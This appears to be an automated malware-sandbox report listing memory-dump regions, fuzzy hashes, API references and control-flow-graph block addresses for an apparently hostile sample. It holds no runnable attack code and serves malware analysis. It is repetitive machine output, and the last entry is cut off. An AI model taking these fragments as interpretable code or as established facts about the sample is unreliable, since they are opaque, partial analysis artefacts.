                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &55p
                                                  • API String ID: 0-1955183375
                                                  • Opcode ID: ee6c51308f10436ffe4b6381e76cba30df9b229c095825f6f8e0ed3693625805
                                                  • Instruction ID: 2d4369c067dc2c59c0cd3f4e59c1ed9dd610733beda71e5c8075ff34a446f0ae
                                                  • Opcode Fuzzy Hash: ee6c51308f10436ffe4b6381e76cba30df9b229c095825f6f8e0ed3693625805
                                                  • Instruction Fuzzy Hash: 2A529C74A01268CFDB64DF65C884BADBBB2BF99300F1085EAD409AB355DB359E81CF50

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 001C91CD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 9a6296d98aea761166231c5b8e619a872b97b078f554bd385b2036e20157a51a
                                                  • Instruction ID: 0bf74751003ceb1fcee3caf4b9ea2cc40df2167c032c864d768d8c4097808ca6
                                                  • Opcode Fuzzy Hash: 9a6296d98aea761166231c5b8e619a872b97b078f554bd385b2036e20157a51a
                                                  • Instruction Fuzzy Hash: FBD1B074E01218CFEB54DFA5C994B9DBBB2BF89300F2484A9D809AB355DB359E81CF50

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85e59642e186f8f10d213d6790aeef816b75533dd37545b7f63d34c22fad0b67
                                                  • Instruction ID: f8698bd02b22b95db575e47969013e0d736d5d4d3a09ad810f3ce238233dd920
                                                  • Opcode Fuzzy Hash: 85e59642e186f8f10d213d6790aeef816b75533dd37545b7f63d34c22fad0b67
                                                  • Instruction Fuzzy Hash: BF417A71E016188FEB58CF6BC95479EFAF3AFC9300F14C1AAD40CAA254EB741A858F51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08866910c3f476932b6d21a8479a470ef3bd232437da427ab269762b8830b037
                                                  • Instruction ID: d8eb9cb74d885bd7237a2615b4f466745ab2f322eeca5c10ac86f2c4c072f9a4
                                                  • Opcode Fuzzy Hash: 08866910c3f476932b6d21a8479a470ef3bd232437da427ab269762b8830b037
                                                  • Instruction Fuzzy Hash: CF417771E016188FEB18CF6BC95479EFAF3AFC9300F14C1AAD40CAA254EB741A858F51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e2971417b1f8128636deae2783e3fa935b84f4baab1d689d48a83c3d4be9a18
                                                  • Instruction ID: f86b80da84c5931a1beb3c977efc52f0d69e83fe3afa54ca225ee09689d625b5
                                                  • Opcode Fuzzy Hash: 5e2971417b1f8128636deae2783e3fa935b84f4baab1d689d48a83c3d4be9a18
                                                  • Instruction Fuzzy Hash: FF416871D016588FEB68CF6BD85479EFAF3AFC9300F14C1AAD40CA6264EB7409858F51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ecd58b3273f6531cc4c033d6eaa6a21c28388e768957d722a859697710562f64
                                                  • Instruction ID: 2813d6e3aa081e33ebf120c9e568b3f2c83d4e5f759c4a3919510e86a90c73fe
                                                  • Opcode Fuzzy Hash: ecd58b3273f6531cc4c033d6eaa6a21c28388e768957d722a859697710562f64
                                                  • Instruction Fuzzy Hash: 47416971E016188FEB68CF6BC95479EFAF3AFC9300F14C1A9D50CA6254EB741A858F51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a6b3a83387cf2cc5cba72412e51cdf75699f508f0f36f56fcc786e61a7875e0
                                                  • Instruction ID: 15d0cfad7824e51dc0cb72bc6d0dfcdc38de9eb702496a724808cd3077de603d
                                                  • Opcode Fuzzy Hash: 8a6b3a83387cf2cc5cba72412e51cdf75699f508f0f36f56fcc786e61a7875e0
                                                  • Instruction Fuzzy Hash: 5341AFB0E012188FDB58DFAAD9547DDBBF2BB99300F60C06AD418AB254EB345946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc7563694f2516ae8afda9be9ef37d2aecdc7b88c80aacd038d33b82b1ebc5e6
                                                  • Instruction ID: dc5c52a44ef8fbad8d0c960942f910200fd8e71cd15e2c78bc5dc2c39b6f2b8c
                                                  • Opcode Fuzzy Hash: bc7563694f2516ae8afda9be9ef37d2aecdc7b88c80aacd038d33b82b1ebc5e6
                                                  • Instruction Fuzzy Hash: CE41AF70E012189FDB18DFAAD95469EBBF2BF89300F54D06AD418AB294EB345946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1aa867cf32e2fdab15f766ab726975f40fbef7601d5a5674fee06bd4ec43e86
                                                  • Instruction ID: f29528dbda36fa5912bab38a5e1a2bfddab7eb41a95475b439bbeb69af5fe24e
                                                  • Opcode Fuzzy Hash: b1aa867cf32e2fdab15f766ab726975f40fbef7601d5a5674fee06bd4ec43e86
                                                  • Instruction Fuzzy Hash: D741AC74E006188FDB18DFAAD8546DEBBB2BF89300F60D06AD419BB254EB349946CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1231 8d2cef-8d2cf6 1232 8d2cf9-8d2d09 1231->1232 1233 8d2c84-8d2c95 1231->1233 1240 8d2d0e-8d2d1b 1232->1240 1237 8d2c9e-8d2c9f 1233->1237 1238 8d2c97 1233->1238 1237->1240 1238->1237 1239 8d2c52-8d2c64 1238->1239 1242 8d2c6d-8d2c6e 1239->1242 1243 8d2c66 1239->1243 1261 8d2d23-8d2d27 1240->1261 1242->1240 1243->1237 1243->1239 1243->1242 1245 8d2c4c-8d2c4d 1243->1245 1246 8d2bc8-8d2bd2 1243->1246 1247 8d2c2a-8d2c4a LdrInitializeThunk 1243->1247 1248 8d2b44-8d2b4b 1243->1248 1249 8d2c01-8d2c19 1243->1249 1250 8d2bd8 1243->1250 1251 8d2c1b-8d2c28 1243->1251 1252 8d2bda-8d2beb 1243->1252 1253 8d2bd5-8d2bd6 1243->1253 1254 8d2b37-8d2b3d 1243->1254 1255 8d2b70-8d2b83 1243->1255 1256 8d2b52-8d2b6b 1243->1256 1245->1261 1246->1253 1247->1245 1248->1256 1249->1247 1249->1251 1257 8d2bd9 1250->1257 1251->1245 1262 8d2bed 1252->1262 1263 8d2bf2 1252->1263 1253->1249 1254->1248 1258 8d2b8a-8d2bc6 1255->1258 1259 8d2b85 1255->1259 1260 8d2bf5-8d2bfb 1256->1260 1257->1252 1258->1246 1258->1257 1259->1258 1260->1249 1260->1255 1264 8d2d2f-8d2d38 1261->1264 1265 8d2d29-8d2d2e 1261->1265 1262->1263 1263->1260 1265->1264
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1271 8d2ad8-8d2afd 1272 8d2aff 1271->1272 1273 8d2b04-8d2b6b 1271->1273 1272->1273 1278 8d2bf5-8d2bfb 1273->1278 1279 8d2c01-8d2c19 1278->1279 1280 8d2b70-8d2b83 1278->1280 1281 8d2c1b-8d2c28 1279->1281 1282 8d2c2a-8d2c4a LdrInitializeThunk 1279->1282 1283 8d2b8a-8d2bc6 1280->1283 1284 8d2b85 1280->1284 1285 8d2c4c-8d2d27 1281->1285 1282->1285 1293 8d2bd9-8d2beb 1283->1293 1294 8d2bc8-8d2bd6 1283->1294 1284->1283 1288 8d2d2f-8d2d38 1285->1288 1289 8d2d29-8d2d2e 1285->1289 1289->1288 1297 8d2bed 1293->1297 1298 8d2bf2 1293->1298 1294->1279 1297->1298 1298->1278
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(000000FF), ref: 008D2C3A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1299 8d2c73-8d2c7d 1300 8d2c7f-8d2c87 1299->1300 1301 8d2c89-8d2c8c 1299->1301 1300->1301 1302 8d2c8f-8d2c95 1300->1302 1301->1302 1303 8d2c9e-8d2c9f 1302->1303 1304 8d2c97 1302->1304 1306 8d2d0e-8d2d1b 1303->1306 1304->1303 1305 8d2c52-8d2c64 1304->1305 1307 8d2c6d-8d2c6e 1305->1307 1308 8d2c66 1305->1308 1326 8d2d23-8d2d27 1306->1326 1307->1306 1308->1303 1308->1305 1308->1307 1310 8d2c4c-8d2c4d 1308->1310 1311 8d2bc8-8d2bd2 1308->1311 1312 8d2c2a-8d2c4a LdrInitializeThunk 1308->1312 1313 8d2b44-8d2b4b 1308->1313 1314 8d2c01-8d2c19 1308->1314 1315 8d2bd8 1308->1315 1316 8d2c1b-8d2c28 1308->1316 1317 8d2bda-8d2beb 1308->1317 1318 8d2bd5-8d2bd6 1308->1318 1319 8d2b37-8d2b3d 1308->1319 1320 8d2b70-8d2b83 1308->1320 1321 8d2b52-8d2b6b 1308->1321 1310->1326 1311->1318 1312->1310 1313->1321 1314->1312 1314->1316 1322 8d2bd9 1315->1322 1316->1310 1327 8d2bed 1317->1327 1328 8d2bf2 1317->1328 1318->1314 1319->1313 1323 8d2b8a-8d2bc6 1320->1323 1324 8d2b85 1320->1324 1325 8d2bf5-8d2bfb 1321->1325 1322->1317 1323->1311 1323->1322 1324->1323 1325->1314 1325->1320 1329 8d2d2f-8d2d38 1326->1329 1330 8d2d29-8d2d2e 1326->1330 1327->1328 1328->1325 1330->1329
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1336 1ce2ab 1337 1ce36a-1ce37b 1336->1337 1338 1ce37d 1337->1338 1339 1ce382-1ce38b 1337->1339 1338->1339 1341 1ce391-1ce3a4 1339->1341 1342 1ce163-1ce188 1339->1342 1343 1ce3ab-1ce3c6 1341->1343 1344 1ce3a6 1341->1344 1345 1ce18f-1ce1c5 1342->1345 1346 1ce18a 1342->1346 1347 1ce3cd-1ce3e1 1343->1347 1348 1ce3c8 1343->1348 1344->1343 1355 1ce1cc-1ce1fe 1345->1355 1356 1ce1c7 1345->1356 1346->1345 1351 1ce3e8-1ce3fe LdrInitializeThunk 1347->1351 1352 1ce3e3 1347->1352 1348->1347 1354 1ce400-1ce4fc 1351->1354 1352->1351 1359 1ce4fe-1ce503 1354->1359 1360 1ce504-1ce50e 1354->1360 1361 1ce200-1ce225 1355->1361 1362 1ce262-1ce275 1355->1362 1356->1355 1359->1360 1364 1ce22c-1ce25a 1361->1364 1365 1ce227 1361->1365 1366 1ce27c-1ce2a1 1362->1366 1367 1ce277 1362->1367 1364->1362 1365->1364 1370 1ce2b0-1ce2e8 1366->1370 1371 1ce2a3-1ce2a4 1366->1371 1367->1366 1372 1ce2ef-1ce350 1370->1372 1373 1ce2ea 1370->1373 1371->1341 1378 1ce357-1ce369 1372->1378 1379 1ce352 1372->1379 1373->1372 1378->1337 1379->1378
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 001CE3ED
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Instruction Fuzzy Hash: A2D1AF74E002188FDB54DFA5C894B9DBBB2FF89300F6081AAD409AB395DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f51f94cbf06a9cf0e89ec36fe8db0613092c518b27fd9d62c8b6d31191bb14e6
                                                  • Instruction ID: 3ce1806d22abc8cc7de7db6f222b4ef6d500e3ea30331ec04f41b59e20a7577a
                                                  • Opcode Fuzzy Hash: f51f94cbf06a9cf0e89ec36fe8db0613092c518b27fd9d62c8b6d31191bb14e6
                                                  • Instruction Fuzzy Hash: 2CD1AE74E012188FDB14DFA5C894B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 492c041c36578a6236bb0fb99aab78b18d843583fcffa2dcadf522c0e7039fc0
                                                  • Instruction ID: 81cb2d1f1b8d52b05a566172e9ad01cc017e2ccebfa4ddb33b5a7df3a151cfd0
                                                  • Opcode Fuzzy Hash: 492c041c36578a6236bb0fb99aab78b18d843583fcffa2dcadf522c0e7039fc0
                                                  • Instruction Fuzzy Hash: B8D19E74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: affc07a8b2995b82d6d10d71069955c2c68499234a6dcce668b3f1154abe1b6f
                                                  • Instruction ID: 4d9738fe925d3d081528831c380b7df615912224979ea75896809828a26bb67e
                                                  • Opcode Fuzzy Hash: affc07a8b2995b82d6d10d71069955c2c68499234a6dcce668b3f1154abe1b6f
                                                  • Instruction Fuzzy Hash: 80D19074E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bca8a5bde99063576ea4b0c37947b3f942ac6b1e673b06750454a8563d5c4542
                                                  • Instruction ID: 465769eded59d7b249cf0af2f1c431fa4042f985abcdecfa54ec8b5fb5bf2974
                                                  • Opcode Fuzzy Hash: bca8a5bde99063576ea4b0c37947b3f942ac6b1e673b06750454a8563d5c4542
                                                  • Instruction Fuzzy Hash: D4D1AF74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41c7fd8a5ff2f3375c8d6bd4bafcefdd277ade9b8d810d9ba71b49c43bc74fba
                                                  • Instruction ID: ddd8330626c3117e087d7f9f410870ef2bb1e20faae609f2235708642c6ea198
                                                  • Opcode Fuzzy Hash: 41c7fd8a5ff2f3375c8d6bd4bafcefdd277ade9b8d810d9ba71b49c43bc74fba
                                                  • Instruction Fuzzy Hash: 42D1AE74E012188FDB14DFA5D994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7baba5186c10930d647ab93347b0d10168e42d202a1f6719e6b544d596005c20
                                                  • Instruction ID: 3fdb6764e9dc029c7c5a78fbc1d2a2e51c983cd0971a3dda051dcda0e8bdd786
                                                  • Opcode Fuzzy Hash: 7baba5186c10930d647ab93347b0d10168e42d202a1f6719e6b544d596005c20
                                                  • Instruction Fuzzy Hash: 17D19074E002188FDB64DFA5C994B9DBBB2FF89300F5481AAD409AB394DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2fe19aa49829aa8bed7a3ad62f39adb790b22c3aeff28290a6ab8109c710c43f
                                                  • Instruction ID: dd37907e3f7aeed6a9c6408f6acfaf648d39566a6099cecb3f85e6f012cd0b7b
                                                  • Opcode Fuzzy Hash: 2fe19aa49829aa8bed7a3ad62f39adb790b22c3aeff28290a6ab8109c710c43f
                                                  • Instruction Fuzzy Hash: 26D1A074E002188FDB14DFA5C894B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e26b65c1d94c00f61854e1ad491fed127111491edae999c8871d8578caf5ede
                                                  • Instruction ID: e3e8127515150260d93261679d7d8951b61ea3dde7163caf3a46f3aea1de8a4b
                                                  • Opcode Fuzzy Hash: 8e26b65c1d94c00f61854e1ad491fed127111491edae999c8871d8578caf5ede
                                                  • Instruction Fuzzy Hash: 85D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aaac7b83884cc70551c1b3f83cb751126a6e382d48c152138d444b2a4e13715a
                                                  • Instruction ID: d3b141b993523b53a8d6b57af9b860859eb85313622ae2886fb2a458cafc26b2
                                                  • Opcode Fuzzy Hash: aaac7b83884cc70551c1b3f83cb751126a6e382d48c152138d444b2a4e13715a
                                                  • Instruction Fuzzy Hash: A8D19074E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c73cab8d35c149d41a1fc606a1995d5b3186387844095efe886ac3362c441ae8
                                                  • Instruction ID: 1c00c69bc1c0870eab59066aa2b7756295b9cd23c8f957a6daa6f1176e2afffb
                                                  • Opcode Fuzzy Hash: c73cab8d35c149d41a1fc606a1995d5b3186387844095efe886ac3362c441ae8
                                                  • Instruction Fuzzy Hash: D8D1A174E002188FDB24DFA5D994B9DBBB2FF89300F6085AAD409AB394DB355E81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d4d31f981918ade8789dfcc9a57fc836db5e51fc3f4d82f091bfad0f54ba9a3
                                                  • Instruction ID: 3f0455c27e7d14ba57bf80cfd6fe06f8fc07ab710aa1056a32b289be1eef07e0
                                                  • Opcode Fuzzy Hash: 7d4d31f981918ade8789dfcc9a57fc836db5e51fc3f4d82f091bfad0f54ba9a3
                                                  • Instruction Fuzzy Hash: A3D1B174E002188FDB54DFA5D894B9DBBB2FF89300F6081AAD409AB394DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a1c78515f704d36bbc9f5c12191922ce97856c4e13a3a2fd0f71b9fafa16a91
                                                  • Instruction ID: d560586aca298689cd80b1bb58f8595906114eb3fe0b983a46fdf4d1618e3ab8
                                                  • Opcode Fuzzy Hash: 3a1c78515f704d36bbc9f5c12191922ce97856c4e13a3a2fd0f71b9fafa16a91
                                                  • Instruction Fuzzy Hash: CAD1BF74E002188FDB14DFA5D994B9DBBB2FF89300F1481A9D409AB355EB319D82CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a054a43f6d2b90e23f10fc2cbf9cd0f8a6fe808fe02b62dfec82700d2b325679
                                                  • Instruction ID: 82a563eacc607b2c59bd13dae1f3b586747582ff3f78ff212b2a33df75fa0b8f
                                                  • Opcode Fuzzy Hash: a054a43f6d2b90e23f10fc2cbf9cd0f8a6fe808fe02b62dfec82700d2b325679
                                                  • Instruction Fuzzy Hash: BCD1B074E002188FDB54DFA5D950B9DBBB2FF89300F6481AAD409AB365EB319D82CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc1b31eaf30c5ea07d1a29facd8bb0d043f63d4cfb2e17fb964c104231403dc5
                                                  • Instruction ID: d03db4d348165a85f3559aa390d6536c7fe4ec8a4ee17ac91bef17dd1d2b7608
                                                  • Opcode Fuzzy Hash: bc1b31eaf30c5ea07d1a29facd8bb0d043f63d4cfb2e17fb964c104231403dc5
                                                  • Instruction Fuzzy Hash: 2ED1AE74E002188FDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355EB319D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f98ea8a892d081f89bb2496bc881c660bf744c4077479f6a5559b7414031d8f2
                                                  • Instruction ID: 328b01e2274f8cda543cec4028e7d112d12dc5cf558bab85784404344917bb08
                                                  • Opcode Fuzzy Hash: f98ea8a892d081f89bb2496bc881c660bf744c4077479f6a5559b7414031d8f2
                                                  • Instruction Fuzzy Hash: 95D1BF74E002188FDB54DFA5D990B9DBBB2FF89300F5481A9D809AB365EB319D82CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0513a09164ecad9298db1327e14cad3df4208994bb15ffc69814fc84377aa344
                                                  • Instruction ID: e799eb3c1ffdf578a429dbb8cbf9a6b4f36ac6278a76acac02dffa8941333f5c
                                                  • Opcode Fuzzy Hash: 0513a09164ecad9298db1327e14cad3df4208994bb15ffc69814fc84377aa344
                                                  • Instruction Fuzzy Hash: 33D1AE74E002188FDB54DFA5D990B9DBBB2FF89300F6481AAD809AB365EB315D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5c3234cc3fea9f66c2d6f66473ee7c02b9d138fa2c3b80233e05bf8f21adf933
                                                  • Instruction ID: e36f94ec7ede3c14dd9c3461ce0ab32b2e7b0aae0fe47b98670fb5a123d62a29
                                                  • Opcode Fuzzy Hash: 5c3234cc3fea9f66c2d6f66473ee7c02b9d138fa2c3b80233e05bf8f21adf933
                                                  • Instruction Fuzzy Hash: 1AD1AF74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD809AB365EB315D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
